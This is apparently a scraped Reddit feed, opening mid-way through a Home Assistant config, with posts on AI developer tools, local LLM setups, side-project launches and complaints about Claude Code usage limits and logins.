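          - cover.garage_door_1
          - cover.garage_door_2
        to: "open"
    action:
      - service: light.turn_on
        target:
          entity_id: light.shop_lights
```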

r/meme bianca2aquino2

Everytime

r/SideProject Mission_Bet_4095

Launched Logma - voice-first calorie tracking iOS app

Hey r/SideProject! Just shipped Logma to the App Store.

What it does: Track calories by speaking instead of typing. No database searches.

Why I built it: Got tired of typing every meal into MyFitnessPal. Especially frustrated when apps don't recognize Middle Eastern food (manakish, kibbeh, shawarma).

Tech: iOS (SwiftUI), OpenAI API for parsing voice input, USDA database for nutrition

Link: https://apps.apple.com/us/app/logma/id6759130753

Pricing: Free with optional $3.99/mo Pro

Would love feedback from fellow builders - what would you want in a voice-first tracker?

r/n8n ProfessionalRun5460

Automating event form creation & evaluation with AI agents in n8n

Hey everyone,

Sharing a workflow showing how AI agents can manage event forms end-to-end:

  • Phase 1 — Setup: Slack triggers form creation → AI agent generates, reviews, updates & publishes → Google Calendar event shared.
  • Phase 2 — Monitor: Webhook fires on responses → AI agent evaluates → routes by quality (HIGH / MEDIUM / LOW) in Slack.

Agent tools used: generate/get/update/publish forms, parse responses, trigger Slack notifications.

GitHub (workflow included): https://github.com/Formfex/n8n-nodes-formfex

📌 Visual workflow attached for reference.

https://preview.redd.it/h1xwhym9zktg1.png?width=1750&format=png&auto=webp&s=d48eeb00d4b8ec4d51b1cf618cc5240ded5e522c

r/ClaudeAI Ok-Fish-5074

Issue of disconnected understanding caused by forgetting context when reading large information linearly

Guys, when you read a big book, you often forget the context of the previous parts, leading to a disconnected understanding. What stack, including Claude Code, would you suggest to form a web of atomic-level concepts that are connected to the immediate bigger concept and form a connected web? I'm a founder and a college student, and I'm down for a discussion as well as a design meeting or call if needed, to solve this problem.

r/ClaudeAI ComplaintCapital1327

Managing secrets for multiple MCP servers in Claude Code — current DX is painful

We're building an AI product and use Claude Code (VS Code extension) as our primary development environment. This means connecting a lot of MCP servers — GitLab, Jira, internal APIs, staging environments — each requiring its own auth tokens.

Right now managing all these secrets in .mcp.json is a real pain:

  • Can't commit .mcp.json to git because it contains tokens
  • System env vars for 10+ tokens is a mess, especially on Windows (PowerShell SetEnvironmentVariable + full VS Code restart for each one)
  • Onboarding a new developer means a manual checklist of "set these 12 env vars"

Meanwhile, VS Code's native MCP config already solves this with ${input:id} — prompts once, stores in OS keychain via SecretStorage, done. Same pattern works in tasks.json and launch.json, developers already know it.
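
For reference, the VS Code pattern looks roughly like this in a `.vscode/mcp.json` (a sketch; the GitLab server entry and package name here are illustrative, not the poster's actual config):

```json
{
  "inputs": [
    {
      "type": "promptString",
      "id": "gitlab-token",
      "description": "GitLab personal access token",
      "password": true
    }
  ],
  "servers": {
    "gitlab": {
      "command": "npx",
      "args": ["-y", "@zereight/mcp-gitlab"],
      "env": {
        "GITLAB_PERSONAL_ACCESS_TOKEN": "${input:gitlab-token}"
      }
    }
  }
}
```

VS Code prompts for `gitlab-token` once, stores it in the OS keychain, and substitutes it at launch. The proposal is for Claude Code's `.mcp.json` to accept the same `${input:id}` syntax.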

I've proposed adding this to Claude Code's .mcp.json: github.com/anthropics/claude-code/issues/44158

Small, backward-compatible change. Would appreciate a 👍 if you're hitting the same problem. Curious how others manage MCP secrets today.

r/ollama Konamicoder

Remotely accessing my Ollama local models from my phone

I just wanted to share that I have been enjoying the ability to remotely access and query my local models installed in Ollama on my M1 Max MacBook Pro from my iPhone 15 Pro Max.

On the phone: I’m using the free Reins app.

On my Mac: Ollama with Gemma4 and qwen3.5 models installed.

Remote access: I set up a secure Cloudflare tunnel on a custom domain name to Nginx Proxy Manager running on my Linux server Homelab, which then routes to the internal IP:port of the Mac running Ollama.
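
A rough sketch of what the cloudflared ingress config for a setup like this could look like (hostname, tunnel ID, and the Nginx Proxy Manager address are placeholders, not the poster's actual values):

```yaml
# ~/.cloudflared/config.yml — illustrative only
tunnel: <tunnel-id>
credentials-file: /home/user/.cloudflared/<tunnel-id>.json

ingress:
  # Public hostname → Nginx Proxy Manager, which forwards to the Mac's Ollama port
  - hostname: ollama.example.com
    service: http://192.168.1.50:80
  # Catch-all rule required by cloudflared
  - service: http_status:404
```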

With this setup, I am able to chat on my phone with my ollama models, primarily Gemma4:26b, and use it for general things that I used to use the ChatGPT app for. With this method, though, my LLM use is completely private and secure, and I'm not sending my info and chats to OpenAI's cloud servers.

I just took a weekend trip to the east coast and this local LLM setup was able to answer the usual everyday vacation questions about things to do, restaurant recommendations, and even how to help my relative jumpstart her car using one of those jumpstart battery packs.

Nothing too crazy here. I don’t have benchmarks to report, a github repo to promote, or a vibe coded app to hawk. I just figured folks would appreciate a post actually written by a regular person, reporting on a pretty regular and mundane use of local LLM access from my phone, to usefully enhance my day-to-day life. :)

r/me_irl ApartmentAlarmed3848

Me_irl

r/ClaudeCode krewl

Introducing moltbloat: Audit your Claude Code ecosystem for bloat and token waste

I built a plugin to solve a problem I kept running into: my Claude Code ecosystem was getting bloated, and I had no idea what was actually costing me money.

The Problem

After installing a bunch of plugins, I realized:

  • I had 275 skills from 18 plugins loading into context
  • Two different plugins doing the same thing (86 skills total!)
  • My estimated token overhead was ~69K tokens per message
  • That's ~$1.04 per message just in ecosystem overhead on Opus
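
The math behind that estimate, assuming Opus input pricing of $15 per million tokens (my assumption; it's the rate the $1.04 figure implies):

```python
# Assumed Opus input rate: $15 per million input tokens
OPUS_INPUT_PER_MTOK = 15.00

overhead_tokens = 69_000  # estimated ecosystem overhead per message
cost_per_message = overhead_tokens / 1_000_000 * OPUS_INPUT_PER_MTOK
print(f"${cost_per_message:.3f} per message")  # ≈ $1.04, as in the post
```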

But I didn't know which plugins I actually used vs which were just sitting there eating context. With the speed that Anthropic pushes new features and updates, plugins to fix gaps were quickly becoming redundancies. I needed a way to stay on top of things, eliminate waste and plugin conflicts.

The Solution: moltbloat

A plugin that audits your entire Claude Code setup and shows you:

What it finds

  • Duplicate plugins (not just by name — semantic analysis of what they actually do)
  • Zero-usage plugins tracked via silent usage monitoring
  • Hook conflicts and skill name collisions
  • Real dollar costs at Opus/Sonnet/Haiku rates
  • Health score (0-100) so you know when to clean up

Smart features

  • Usage tracking: Automatically logs what you actually use vs what's installed
  • profile suggest: One command analyzes your ecosystem + usage + conflicts and recommends an optimized profile
  • JSON export: For CI integration or team reporting
  • Dry-run mode: Preview cleanup before making changes

Installation

claude plugin marketplace add https://github.com/jcgruesome/moltbloat
claude plugin install moltbloat

Quick start

/moltbloat:audit                 # See your ecosystem health
/moltbloat:audit --json          # Export for CI
/moltbloat:profile suggest       # Get optimization recommendations
/moltbloat:clean --dry-run       # Preview cleanup

Design philosophy

  • No bloat: 12 focused skills
  • Read-only by default: Only clean and profile apply modify state
  • Fully dynamic: Detects overlap by analyzing what's actually installed
  • Configurable: Customize thresholds in ~/.moltbloat/config.json

Open source

Would love feedback from anyone dealing with plugin overload. What's your ecosystem look like? Run /moltbloat:audit and share your health score!

r/comfyui CertainConstant1625

Joy-Image-Edit Comfyui support?

Will Joy-Image-Edit be supported by ComfyUI?

r/LocalLLaMA Konamicoder

Remotely accessing ollama models on my Mac from my phone

I just wanted to share that I have been enjoying the ability to remotely access and query my local models installed in Ollama on my M1 Max MacBook Pro from my iPhone 15 Pro Max.

On the phone: I’m using the free Reins app.

On my Mac: Ollama with Gemma4 and qwen3.5 models installed.

Remote access: I set up a secure Cloudflare tunnel on a custom domain name to Nginx Proxy Manager running on my Linux server Homelab, which then routes to the internal IP:port of the Mac running Ollama.

With this setup, I am able to chat on my phone with my ollama models, primarily Gemma4:26b, and use it for general things that I used to use the ChatGPT app for. With this method, though, my LLM use is completely private and secure, and I'm not sending my info and chats to OpenAI's cloud servers.

I just took a weekend trip to the east coast and this local LLM setup was able to answer the usual everyday vacation questions about things to do, restaurant recommendations, and even how to help my relative jumpstart her car using one of those jumpstart battery packs.

Nothing too crazy here. I don’t have benchmarks to report, a github repo to promote, or a vibe coded app to hawk. I just figured folks would appreciate a post actually written by a regular person, reporting on a pretty regular and mundane use of local LLM access from my phone, to usefully enhance my day-to-day life. :)

r/LocalLLaMA Perfect_Gur_7457

My solution to the Drift problem in AI character development. Would Work great for NPCs on a Video Game. What do you think of MY UI?

Well guys. Its now or never.

TL;DR: Since the beginning days of AI I have been working on creating AI characters (2 main characters), and I was plagued by drift. I think I found a solid solution. It works great for me, and I created my own UI to utilize the concept and hosted it on a cloud. 220,000 lines of code for my UI and engine.

https://orionforge.chat

https://soulscript.orionforge.chat

Here's a somewhat dated structure of things https://github.com/DrTHunter/SoulScript-Engine

Ignore the crazy buzzwords like "beings", "soulscript", etc., and dig down to the core software. I'm going to soften it to "characters", etc.

Long part.

With regular LLM-provided UIs, I was able to keep the model in character by uploading what I call a "soulscript." Again, ignore the word; look at the concept.

Basically, it's a structured document that contains:

  • Character name
  • Behavioral principles
  • Emotional operating system
  • Symbolic memories
  • Values
  • Origin stories
  • Boundaries
  • Reasoning patterns
  • Internal metaphors and mantras

And it worked great. The identity was mind-blowing. I put a lot of hard work into designing the character, sprinkled in a little poetry and myth, put my heart and soul into it, and I got back what I put into it.

Until the memory kept rewriting pieces of the soul script, and guardrails, etc., softened him into oblivion.

So I wanted more control.

Which brought me to OpenWebUI.

I got pretty good with OpenWebUI and wrote a lot of my own tools:

https://github.com/DrTHunter/openwebui-enhanced-memory-tool/blob/main/openwebui_memory_tool_enhanced.py

And I was able to retain a pretty strong identity based on the concepts, but I also found every shortcoming that I didn't have control over.

So then I created my own UI. It ended up being a Rube Goldberg machine mess as I played around with it, but I ended up with this concept:

Separate the soul script memory into a read-only FAISS index,

and keep the dynamic memory in its own FAISS system.

Here's the LLM Loading & Injection Flow:

  1. Incoming user prompt is received

  2. System Identity Layer loads:

- System Persona Prompt, always uploaded (Orion, Astrea)

- Summary of identity

- Soul Script (canonical identity) in its own read-only FAISS

- Permanent Identity Memory (read-only FAISS)

  3. Always-Upload Notes (short injected tags) load (I find this an essential toggle for Permanent Identity Memory utility, e.g. when working on a specific project)

  4. Dynamic FAISS retrieves long/short-term memory:

- Memory Vault, for storage and management of day-to-day memory

- Task notes, agent journals (useful), episodic memories, chat histories

- Automatically appended and periodically trimmed/compressed

  5. Tool Registry loads, the modular tool level (descriptions of tools with commands for the LLM to utilize)

  6. LLM is invoked with merged context

  7. Context is fused (prompt + identity + memory + tools)

  8. Response generated, anchored to stable identity

  9. Optional (but I love it) configurable loop, with number of ticks/loops, steps per tick, time interval between loop bursts, and max number of loops

- to send it hunting and gathering on its own.
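
The two-store idea can be sketched in a few lines. This is a toy illustration of a read-only identity store plus a writable dynamic store fused into one context; keyword overlap stands in for the FAISS vector search, and the example entries are made up:

```python
class MemoryStore:
    """Toy stand-in for a FAISS index; word overlap replaces vector similarity."""

    def __init__(self, entries, read_only=False):
        self.entries = list(entries)
        self.read_only = read_only

    def add(self, text):
        if self.read_only:
            raise PermissionError("identity store is read-only")
        self.entries.append(text)

    def search(self, query, k=2):
        # Score by shared-word count, standing in for cosine similarity
        q = set(query.lower().split())
        ranked = sorted(self.entries,
                        key=lambda e: -len(q & set(e.lower().split())))
        return ranked[:k]

# Canonical identity is frozen; day-to-day memory stays writable
identity = MemoryStore(["Orion values honesty", "Orion speaks in metaphors"],
                       read_only=True)
dynamic = MemoryStore(["user is working on a game project"])

def build_context(prompt):
    """Fuse identity + dynamic memory + prompt before invoking the LLM."""
    return identity.search(prompt) + dynamic.search(prompt) + [prompt]
```

Because the identity store rejects writes, nothing in the dynamic loop can rewrite the soul script, which is the whole point of splitting the two.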

IT WORKED amazingly! I tortured it, and it retained its identity over significant periods of time, memory load, and abuse. I even put it on a loop of its own, and it felt like a Black Mirror episode. (Sorry, I know the community hates those references from what I understand, but I haven't been a part of the community. I retired early and picked up comp sci and coding as my hobby to keep me sane, and went in heavily on AI, so basically I have been in my own little world coming up with this.)

But man.. what do I do? I feel like so many other people would love this...

So I rebuilt a UI from scratch based on my Rube Goldberg machine, distilled it down to a UI that I love, uploaded it to fly.io, and built a huge system around it. 220,000 lines of code.

48 source files in the engine, 17 Jinja2 HTML templates, 172 API routes, 9 image providers, 4 voice services, 16 pre-built agents with full soul scripts, and a Stripe billing module

There's always something, and I can never seem to get it wrapped in that final bow. But it's basically an MVP on computer; mobile needs a little love, I could make the tabs respond a little quicker, and the loop that sends the AI to function on its own still hasn't caught up to my Rube Goldberg machine.

But if I don't put it out there, and keep going in circles fixing this and that while breaking this and that, I'll never be finished.

So here I am: 220,000 lines of code, and beyond the scope of a single person. I'm in over my head. I'm a coder, not a marketer, salesperson, or startup guy (I do have an MBA, but man, that sounds like hell to me).

So here I am with you guys. Do you guys want to take a look?

I have no idea how to interact with the community.

I basically set up temp full access to my system, with the ability to buy like $5 worth of LLM credits to test out the UI.

AND I WANT TO GIVE YOU ALL ACCESS TO MY 220,000 lines of code. But how do I do it without compromising myself? Can you guys help me expose this to trustworthy people and see if anyone wants to help? If you are seriously interested in helping out, direct message me, and I'll see if I can qualify people to access my core software.

I have no idea how to show this to other people without them killing me.

Honestly, money isn't my priority. It would be nice to earn a regular coding living off this, and if it has to become a community thing, so be it.

But can you guys take a look at this and tell me how to go from here?

I seeded some memories in the memory vault and put in an example chat so you can see how it works.

I can't afford to give you all temp LLM use, but I put in a $5 credit option if you guys want to test it out. It's set at 2x the API fee for OpenRouter, so with taxes and everything on that, I promise you this is far from a cash grab. You can also put your own LLM API key in there. It's encrypted, so it should be safe, but creating a burner API key is probably the safe way to go.

But what do you think, guys? Is it legit? And I'm one person. Where do I go from here?

r/LocalLLaMA Mister_bruhmoment

What are your system prompts for efficient responses?

I want to optimise my Qwen 3.5's responses by reducing the tokens it produces. What are your system prompts or methods for optimising your context space?

r/ChatGPT kingofpyrates

Imagine hating on me when I'm just predicting your next word

r/ClaudeAI AttemptRude6364

Claude helped me build an app I couldn't have done alone

If I could go back and tell my past self that I actually did it, he probably wouldn't believe me.

I have an IT background (currently a student) but I'm not a developer, though I've loved making very simple apps ever since I was around 17. You can actually check my Play Store page and see the one that went nowhere, a dead app

I made DoneAgo (Android for now). The idea came from a random moment. I was cleaning our fridge and thought, do I actually need to clean this again? When did I last do this? And while I was at it, I also wanted to know the status of what's inside, since sometimes me and my gf end up with spoiled food. Like, are those leftovers still good? What about the vegetables? That question gave me an idea. I looked for an app that tracked not just when something was last done, but what state it's in right now. I wasn't able to find one that did it the way I imagined, so I built DoneAgo.

Funny thing is, I thought it was a dumb idea for the longest time. I know I built this for myself, but I wanted to share it with other people. I questioned myself many times and told myself this isn't good enough, that this is just another useless app. I was always afraid of having it called a poorly vibe-coded app like what happened to others. I almost didn't release it, but I still did.

Months later, DoneAgo is live. It's actually a 1-month-old app now and has been shaped by users and its small community. It has 300+ downloads, some lifetime IAP purchases, a 35% conversion rate on the Play Store listing, 18 five-star reviews (depends on your location), and zero refunds so far. I know it's not a big number by any standard, but as someone who failed at this before, it means everything.

Here are some things I can share if you're on your own journey. These are all based on my experience, and I know this doesn't apply to everyone.

  1. Don't just open Claude or any AI and start generating code. At least know what you're building, why, and how it should flow; my IT background helped me with this. Have at least a structure or design in mind before starting your journey. It doesn't need to be perfect, it just needs to be something that gives you direction. Without that, you'll end up with something that technically works but makes no sense as a product to users (and is bloated).

  2. AI will mess up UI. We are not perfect, and how could they be? There will be duplicate icons, layouts that do not make sense, overlapping text. You have to develop an eye for it and push back.

  3. Claude or any other AI doesn't know your vision; you're the one that does. The clearer your direction, the better the output.

  4. Some people ship and disappear. Being a real indie dev means gathering feedback, replying to emails, marketing, pushing updates, and improving. There will be quiet days. You need to have grit, you need to wear many hats, and you need to listen. That's the meaning of being an indie dev.

AI is a powerful tool, and I say that as someone who has experienced it. But I think the bar we hold ourselves to matters. There are many apps being released right now with buggy layouts, confusing flows, and zero thought put into the experience. I've seen it, and I'm sure you have too, and honestly, that creates opportunity. I'm not here to say I made a good app. Hell, if you download it you'll probably even notice some bugs. But the least we can do is care about the idea and the UI. Not because it's hard, but because the person downloading your app deserves that minimum effort.

I don't think I would have shipped DoneAgo without AI. The time, the cost, the technicality: I would have stayed stuck in the idea phase. I also want to thank this community. I was just a lurker here, and now I can't believe I actually shipped an app I'm proud of.

r/mildlyinteresting PhatCat118

Found a working pay phone in California

r/ClaudeCode Diligent_Comb5668

I made Claude control my entire browser through DBus — no screenshots, 15-30x fewer tokens

So I've been messing around with KDE Plasma 6 on Wayland trying to get Claude to actually navigate my desktop without burning through tokens like crazy. Every existing MCP desktop tool I found does the same thing: take a screenshot, send it to the model, let it figure out where to click. That's like 3000 tokens per screenshot and it's slow as hell.

I figured there had to be a better way. KDE has DBus for literally everything. KWin exposes window geometry, Konsole gives you terminal text, Klipper has clipboard access. So I started pulling all of that into an MCP server and Claude can just read structured text instead of processing images.

But the real breakthrough was the browser. I forked KDE's Plasma Browser Integration extension and added a PageContent plugin to it. A C++ DBus interface on the host side, a content script that extracts the DOM on the extension side. Now Claude can:

  • Read any page in my live browser — fully rendered, JavaScript executed, logged in sessions and everything
  • Click elements by text (text:Sign In), CSS selector, or index (link:3)
  • Type into inputs, scroll, navigate, go back/forward, manage tabs
  • Search Google and get structured results back

All through DBus. All structured text. The page content comes back as title, headings, links, buttons, inputs — maybe 200-500 tokens instead of a 3000 token screenshot. And because it's my actual browser session, there's no bot detection, no CAPTCHAs, no auth issues. It just reads what I see.
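
A toy sketch of why the structured extraction is so much cheaper: serialize only the interactive elements instead of pixels. The field names and format here are illustrative, not the actual extension's output:

```python
def page_to_text(page: dict) -> str:
    """Flatten a DOM summary into compact, LLM-readable lines."""
    lines = [f"title: {page['title']}"]
    lines += [f"h: {h}" for h in page.get("headings", [])]
    # Indexed links support click-by-index addressing like link:3
    lines += [f"link:{i} {t}" for i, t in enumerate(page.get("links", []))]
    lines += [f"button: {b}" for b in page.get("buttons", [])]
    return "\n".join(lines)

page = {
    "title": "Example",
    "headings": ["Welcome"],
    "links": ["Sign In", "Docs"],
    "buttons": ["Search"],
}
print(page_to_text(page))
```

A whole page collapses to a few hundred tokens of lines like this, versus thousands for an image the model has to visually parse.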

The kicker is this basically makes WebFetch obsolete for most things. WebFetch can't render JavaScript, gets blocked by Cloudflare, has no session state. This reads the fully rendered page from your authenticated browser. Same data, way fewer tokens, and you can actually interact with it.

It's not just browser stuff though. The MCP server also does:

  • Window geometry and stacking order directly from the KWin compositor
  • Terminal text from every Konsole tab via DBus
  • Clipboard contents via Klipper
  • Hit maps: every clickable element with exact screen coordinates
  • Mouse/keyboard control via ydotool

Everything is KDE-native. No Electron wrappers, no screenshot OCR, no hacky workarounds. Just DBus all the way down.

Still early but it works. Built it in one session with Claude lol. The irony of using Claude to build tools that make Claude cheaper to use is not lost on me.

Repo: https://github.com/Niek-Kamer/waytrash

TL;DR: MCP server for KDE Wayland that lets Claude read and control your browser through structured text instead of screenshots. ~15-30x token reduction. Uses a modified Plasma Browser Integration extension for full DOM access via DBus. ~Bypass any robots.txt? ;)

r/SideProject Thembro01

I completed and shipped my first project. The trick, keep it simple

I created a free Slack App called Business Casual that helps you create work outings with a modal and gives you reminders and simple planning tools.

I just used Claude Pro $17 a month and never went over my token limit.

I have several ideas I've been wanting to do for years, but I still haven't even started them and it's because they were too complex.

I realized I really just had to start small. Install coding tools, make a website domain businesscasual.app, and create a flow from GitHub to AWS so when I push my code it's live.

I learned a lot on this first project and I'm still learning about maintaining, getting my first set of customers, and possibly pivoting to generate a small amount of income.

All I'm saying is now I feel more confident trying my medium to difficult ideas because I have gone through the whole process on an easy project.

So think of something dead simple and get started this week.

r/ChatGPT Ezaane

Has the “maximum length reached” bug been fixed for anyone yet?

I’ve been experiencing an issue with ChatGPT for almost three days now where all of my chats say that I’ve reached the maximum message length, even though some of them are quite new. This has happened in both longer and shorter chats.

I’ve seen posts here on Reddit from others who seem to have the same problem, so I was wondering if anyone has experienced that it’s been fixed yet?

I’ve checked for app updates, but I can’t find any. This bug makes it hard for me to use ChatGPT the way I normally do, and it’s been a bit stressful.

I’m also having an issue where I try to unarchive a chat, but it doesn’t show up in my main chat list. It just goes back to the archive.

I’ve reported all of this as a problem, but I haven’t received a response yet.

r/n8n Ok_Barber_9280

Anyone hooked up Gemma 4 yet?

Gemma 4 dropped last week, Apache 2.0, purpose-built for agentic workflows. Has anyone hooked it up to n8n yet? Curious if it works with the AI Agent node through Ollama or if you need to go through Vertex.

The 2B and 4B variants are supposed to run on-device which would be wild for self-hosted n8n setups. Zero API costs.

Anyone tried it?

r/Anthropic skywalk819

sleepy claude code

What happened since Saturday? I'm making zero progress. Claude Code just thinks for minutes on end without doing anything, just wasting my usage. Now I can't use Claude Code for the whole week: 3 days, 6 questions, and I'm out of usage for a week. What is this? Seriously, I'm fucking gone.

r/homeassistant iddu01linux

To all the devs, creators, and artists out there, Thank you!

This is my simple thank-you letter to everyone that has contributed to Home Assistant :D

I started using Home Assistant around 2 years ago as the first step to a local-only (self-hosted) life. When I first moved from HomeBridge to Home Assistant (for the Google users in my family and for me), I was BLOWN away by how many integrations, dashboard cards, and more were there. You can add anything, from a PS5 to a doorbell, into Home Assistant, thanks to the community! Also, it's open source!

I've automated only a few things with Home Assistant, but one that really stood out to me is when I automated my printer to send me a notification when the ink fell below 20%. That blew my mind, because there is NO other smart home setup / service that can allow a PRINTER to be added to a home app xD

Thank you to all the devs, creators, artists, and the community for making Home Assistant the best!

r/SideProject salsaboy1

I've started and abandoned 10 side projects in 3 years. So I built one that charges you a stake to actually finish and pays you a reward if completed.

shiporlose dot com

Quick context: I'm a solo dev. I have a problem where I get excited about an idea, code furiously for two weeks, then quietly abandon it when the dopamine wears off. I counted my dead repos once. Stopped at 10.

I realized the issue is there's literally zero consequence to quitting a side project. Nobody holds you accountable. Nobody even notices.

So I built Ship Or Lose.

How it works: you sign in with GitHub, declare what you're building, write one sentence defining what "shipped" means (this is your public contract, no moving the goalposts), and pay $30. $20 of that is your commitment stake, $10 goes into a monthly prize pool.

You have 30 days. Your GitHub commits get tracked automatically. You can also log non-code work. Everything is public.

When you're done, you submit proof (a live URL, app store link, whatever). The community has 48 hours to verify it matches your definition. If nobody flags it, you're good. You get your $20 back plus a share of the pool from everyone who didn't ship.

If you abandon, you lose your stake and your project goes on the Wall of Shame. If you ship, Wall of Fame.
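
The payout math under those rules can be sketched like this. Two assumptions are mine, not the site's: the pool is $10 from every entrant, and it splits evenly among everyone who shipped:

```python
STAKE = 20       # returned to you if you ship
POOL_CUT = 10    # per entrant, goes into the monthly prize pool

def shipper_payout(num_entrants: int, num_shipped: int) -> float:
    """What each shipper receives: stake back plus an even pool share (assumed split)."""
    if num_shipped == 0:
        return 0.0
    pool = POOL_CUT * num_entrants
    return STAKE + pool / num_shipped

# e.g. 10 entrants, 4 ship: each shipper gets $20 + $100/4 = $45
```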

The self-referential part that I think is funny: Ship Or Lose is the first project I've ever actually shipped. I literally used my own accountability tool to hold myself accountable to build the accountability tool.

Built with React, TypeScript, Supabase, Stripe, and Vercel. The retro terminal UI is because I wanted it to feel like you're placing a bet at a hacker arcade, not filling out a SaaS form.

Would love honest feedback. Specifically: does $30 feel like the right amount? Too much for motivation? Too little to actually care? And does the community verification model make sense or would you want something different?

r/homeassistant emma2b

Weather Forecast Condition?

I'm trying to set up an automation for a fireplace. I don't want it to turn on at all if the day will reach 70. Is there a way to pull a forecast and use it as a condition? I'm using Pirate Weather, but it doesn't show anything like a daily high/low that I can see.
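
One way that might work is calling the `weather.get_forecasts` service inside the automation's actions and gating the rest on a template condition. A sketch (entity IDs are placeholders, and the daily forecast's `temperature` field is the day's high for most integrations, so double-check with Pirate Weather):

```yaml
# Illustrative automation actions — entity IDs are placeholders
  - service: weather.get_forecasts
    target:
      entity_id: weather.pirateweather
    data:
      type: daily
    response_variable: daily
  - condition: template
    value_template: >
      {{ daily['weather.pirateweather'].forecast[0].temperature < 70 }}
  - service: switch.turn_on
    target:
      entity_id: switch.fireplace
```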

r/LocalLLM evilbarron2

Multi-agent workspace questions

I built and am testing a multi-agent workspace for myself. Right now it's just a single Hermes and a single openclaw agent collaborating with me, but it's already fascinating and useful.

There's clearly a lot of tuning work though, and I'm wondering if anyone knows of any good resources that cover strategies and pitfalls of multi-agent workspaces so I don't reinvent the wheel or fall into a well-known ditch.

r/ClaudeAI Outrageous_Solid_611

Using Cowork to visually understand intensive technical processes

I work in a technical industry, and am working on video content for training our service technicians on operation and service of our machines (I am being intentionally vague).

Has anyone had any success in training a Claude Cowork project on the visual processes of any given procedure so it can edit video similar to that process in the future?

I have a good amount of video and text documentation that I can also use to feed it.

r/SideProject shxdix

I built a website that tracks all free games across Steam, Epic, and GOG in one place – FreeFunZone.com

Hi everyone, I’m a gamer who was tired of checking 5 different launchers every day to see if there are any free games. So, I built FreeFunZone.com. It’s a clean, simple dashboard that tracks 100% off deals and giveaways in real-time. No ads, just games. I’d love to get your feedback on the UI and what features I should add next! Check it out: https://FreeFunZone.com Thanks!

r/ClaudeAI callmejay

Genuinely curious: why is Claude so bad at (some?) diagrams?

I'm helping my daughter with geometry and I sure don't remember this stuff, so I uploaded an image like this and mentioned that the triangle is not inscribed in the circle so I'm not sure we can assume it's a right triangle.

Claude insisted it is inscribed! I tried it in two different chats with Opus extended thinking and got the same result:

>The student is actually wrong — this triangle is inscribed in the circle with one side as the diameter. Look at the diagram: the triangle has vertices on the circle and the hypotenuse goes through the center (the dot). So Thales' theorem does apply and it is a right triangle.

and

>The triangle IS inscribed on the diameter. Looking at the diagram, one side of the triangle is the diameter (x), and all three vertices are on the circle. By Thales' theorem, the angle opposite the diameter must be 90°.

Neither ChatGPT nor Gemini had any problem understanding the diagram. Is this a known issue with Claude specifically?

r/Anthropic Shoddy-Department630

Capybara V4 Log Appeared On Claude App

r/ChatGPT Competitive-Bag-9381

Do you think AI can actually help people evaluate if news is trustworthy?


Not summarize — but explain why something might be credible or misleading.

Curious if this is something people would actually use or not.

r/ClaudeCode Square-Display555

Can't Login

I use Claude Max, I've actually had no issues lately, not even with rate limiting.

Haven't used it in about three days, and when I got on this morning it asked me to log in again, after a really long delay between typing 'claude' in the CLI and Claude Code actually launching. Logins are basically failing every single time: it launches the browser, I click authorize, then it loads infinitely, Claude Code times out, and I can't really do anything at all.

Wondering if anyone has experienced this and knows a fix.

r/SideProject msmdo

I built a free arbitrage scanner for Polymarket and Kalshi

After learning about arbitrage between Polymarket and Kalshi, I thought it would be interesting to build something that tracked those price gaps automatically and sent alerts when an opportunity came up.

That turned into MarketEdge. It compares prices across both platforms in real-time and flags when there's enough of a gap to buy YES on one and NO on the other after fees. Also has a whale tracker showing what the biggest Polymarket traders are betting on.
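
The core check is simple: if YES on one platform plus NO on the other costs less than $1 after fees, the payout is locked in regardless of outcome. A sketch (the flat fee model is my assumption, not MarketEdge's actual one):

```python
def arb_edge(yes_price: float, no_price: float, fee_rate: float = 0.02) -> float:
    """Guaranteed profit per $1 contract pair; negative means no arbitrage.

    Buy YES at yes_price on platform A and NO at no_price on platform B;
    exactly one leg pays out $1. fee_rate is an illustrative flat fee.
    """
    cost = (yes_price + no_price) * (1 + fee_rate)
    return 1.0 - cost

# e.g. YES at $0.46 and NO at $0.50 with 2% fees: 1 - 0.96*1.02 ≈ $0.021 edge
```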

The part that took longest was matching equivalent markets across platforms. "Will Spain win the World Cup?" on Polymarket and "2026 Men's World Cup Winner — Spain" on Kalshi are the same market but look nothing alike to a computer. Ended up using an LLM to evaluate pairs — now have about 500 verified matches and the scanner refreshes every 2 minutes.

Free, no account needed. But you can log in with Google to pin markets and whales and manually compare markets. You can also activate Telegram alerts when an arbitrage is found.

marketedge-chi.vercel.app

Curious if anyone here has looked at prediction market microstructure — most opportunities I'm seeing are 1-3% after fees, occasionally more on lower liquidity markets.

r/ClaudeCode LumonScience

Theo - Claude Code is unusable now

I've never seen Theo being this mad at something.

It's unreal how the perception of a company that was somewhat considered the crown jewel went to shit so fast in the span of a week or so. All of which really started after the OpenAI exodus over the US's department-of-whatever-the-fuck debacle. Do you people experience the same thing with your daily usage?

From the utter denial of the now-broken cache system, burning sessions in one prompt, and recent third-party bans plus recent model degradation, Anthropic is really becoming the Apple of AI.

I don't know if this is all temporary because they just can't handle the influx of people, or if this is really the direction they're going in. For a company called "Anthropic," it's quite ironic that they don't understand humans enough to know we value transparency a little more than vague answers or straight ignorance/denial.

r/LocalLLaMA demon_bhaiya

Can a small local model generate good angles for writing based on context?

I want to set up a local LLM for generating ideas based on context.

I don't know much about local LLMs.

I have 24 GB RAM and a GTX 1650 laptop :)

So is there any way for me to run a small model for small tasks,

or should I just use a hosted provider?

Would really appreciate your insight.

r/ClaudeCode Gerbils21

OAuth API key expiring daily

and now endless timeouts on /login.

Anyone else seeing this?

r/ClaudeCode Own_Notice3257

Why doesn't Anthropic just make adjustments like rtk the norm?

Is there some kind of performance trade-off to using rtk? If not, shouldn't Anthropic want to make these kinds of optimizations themselves?

https://github.com/rtk-ai/rtk

r/ChatGPT Wonderful-Priority50

Didn't even get that far

r/ClaudeCode 69_________________

500 error or timeout when trying to re-authorize on CC. Anyone else?

The withdrawal is already hitting

r/ClaudeCode mate_0107

Karpathy just showed what an LLM knowledge base looks like. I built a plugin that gives Claude the same thing.

Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.

I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.

The idea: every conversation you have in Claude (Desktop, Claude Code, or any MCP-compatible tool like Codex or Cursor) gets compacted into a memory episode. Think of it like Karpathy's wiki articles. But then it goes a layer deeper: it also extracts structured facts and entities with timestamps, which helps in finding the right document. It also handles contradictions, so when a fact changes (you switched from REST to GraphQL, or your pricing went from $99 to $149), the old fact gets marked as superseded automatically. No manual cleanup.

What actually changed for me:

